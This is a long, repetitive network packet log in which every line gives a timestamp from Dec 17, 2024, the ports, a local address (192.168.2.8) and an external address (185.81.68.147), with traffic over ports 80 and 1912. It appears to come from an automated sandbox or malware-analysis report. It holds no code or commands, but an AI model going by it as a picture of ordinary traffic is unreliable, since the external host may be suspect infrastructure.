                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.614926100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.615164995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.615331888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.615935087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.616089106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.616170883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.616837025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.616920948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.617240906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.617794037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.617949009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.618007898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.618602991 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.618709087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.618820906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.619088888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.619720936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.619803905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.620414972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.620767117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.620780945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.620923042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.621623039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.621731043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.621845961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.622546911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.622699976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.622924089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.623506069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.623608112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.623866081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.624486923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.624568939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.624671936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.625406981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.625505924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.625736952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.626351118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.626446962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.626547098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.627285957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.627418995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.627612114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.628252983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.628359079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.628401041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.629245996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.629363060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.629492998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.630211115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.630323887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.630805016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.631196976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.631285906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.631335974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.632074118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.632179022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.632225037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.633059025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.633166075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.633270979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634056091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634166002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634274960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634938002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.635035038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.635149956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.635879040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.636046886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.636133909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.636878967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.636975050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.637099028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.637784004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.637886047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.637957096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.638768911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.638859987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.639259100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.639753103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.639807940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.639878035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.640685081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.640815020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.640880108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.641627073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.641681910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.641746998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.642569065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.642676115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.642802954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.643490076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.643621922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.643721104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.644440889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.644551992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.644614935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.645421028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.645597935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.645714045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.646431923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.646524906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.646611929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.647303104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.647464037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.647535086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.648296118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.648518085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.649199963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.649224997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.649324894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.649969101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.650109053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.691880941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.792531967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.792627096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.792889118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.792999983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.793035030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.793104887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.793977022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.794100046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.794203997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.794914007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.794970036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.795171022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.795811892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.795923948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.796005011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.796773911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.796895027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.796950102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.797714949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.797862053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.797919989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.798670053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.798723936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.798860073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.799643993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.799772978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.800266981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.800560951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.800683975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.800756931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.801548004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.801640987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.801959991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.802475929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.802589893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.802675962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.803479910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.803514957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.803745985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.804383039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.804501057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.804682970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.805357933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.805459023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.805576086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.806322098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.806413889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.806515932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.807245016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.807380915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.807580948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.808223963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.808373928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.808495998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.809159994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.809267044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.809376001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.810110092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.810216904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.810297012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.811064959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.811176062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.811295033 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.812037945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.812192917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.812340975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.812952042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.813072920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.813378096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.813954115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.814034939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.814225912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.814848900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.814965963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.815165997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.815819025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.815934896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.816051960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.816792965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.816883087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.816967964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.817704916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.817851067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.817939043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.818680048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.818732023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.818908930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.819648981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.819746017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.819910049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.820553064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.820702076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.820821047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.821540117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.821666956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.821836948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.822465897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.822626114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.822696924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.823448896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.823590040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.823662996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.824409962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.824500084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.824578047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.825383902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.825460911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.825570107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.826335907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.826391935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.826472044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.827259064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.827378988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.827497005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.828208923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.828334093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.828490973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.829185009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.829272985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.829371929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.830115080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.830199957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.830394983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.831054926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.831237078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.831331015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.831995010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.832165003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.832308054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.832971096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.833093882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.833209991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.834019899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.834110022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.834193945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.834872961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.835030079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.835127115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.835879087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.835973978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.836055994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.836806059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.836910009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.836981058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.837734938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.837886095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.837956905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.838670969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.838778973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.838849068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.839601994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.839741945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.839853048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.840545893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.840667963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.840784073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.841521025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.841651917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.841959000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.842381001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.895029068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.940901041 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.940957069 CET191249710185.81.68.147192.168.2.8
